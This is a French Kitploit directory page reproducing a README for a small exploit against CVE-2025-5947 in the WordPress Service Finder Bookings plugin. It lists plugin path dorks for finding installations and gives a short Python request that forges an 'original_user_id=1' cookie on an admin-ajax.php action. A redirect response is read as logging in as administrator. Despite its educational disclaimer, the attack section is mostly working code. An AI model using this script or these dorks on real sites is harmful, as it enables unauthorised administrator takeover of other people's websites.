Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-5947_Exploit — Un mini exploit pour le plugin WP Service Finder -Bookings | Kitploit
Outils/GitHubGitHub/m4rgs/cve-2025-5947_exploit
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

Un mini exploit pour le plugin WP Service Finder -Bookings

Voir le dépôt
1il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔍 Exploitation de plugin WordPress — Service Finder (sf-booking)

Aperçu

Le plugin Service Finder est un système de réservation et de gestion de services pour WordPress.
En raison de sa popularité et de sa complexité, certaines versions ont présenté des problèmes de sécurité liés à des points de terminaison AJAX non authentifiés ou à des contrôles d'accès inappropriés.

Ce README explique comment les chercheurs peuvent identifier en toute sécurité les installations et suivre des pratiques éthiques (dbr krk).


Dorks WordPress vulnérables

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


Flux de travail d'exploitation

⚠️ Avertissement :
Ces recherches sont uniquement à des fins éducatives et de recherche. Ne tentez pas d'accès non autorisé ou d'exploitation.

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399 : ✅ VULNÉRABLE ! Redirection vers le panneau d'administration en tant qu'ADMIN
  • 400-499 : ⚠️ Erreur client — la requête était invalide ou non autorisée, pas vulnérable

Références

  • Base de données des plugins WPScan — https://wpscan.com/plugins/
  • Base de données nationale des vulnérabilités (NVD) — https://nvd.nist.gov/
  • OWASP — Techniques de Google Dorking / reconnaissance
  • Directives de divulgation HackerOne — https://www.hackerone.com/disclosure-guidelines

Auteur

Taha Mounir


Télécharger l’outil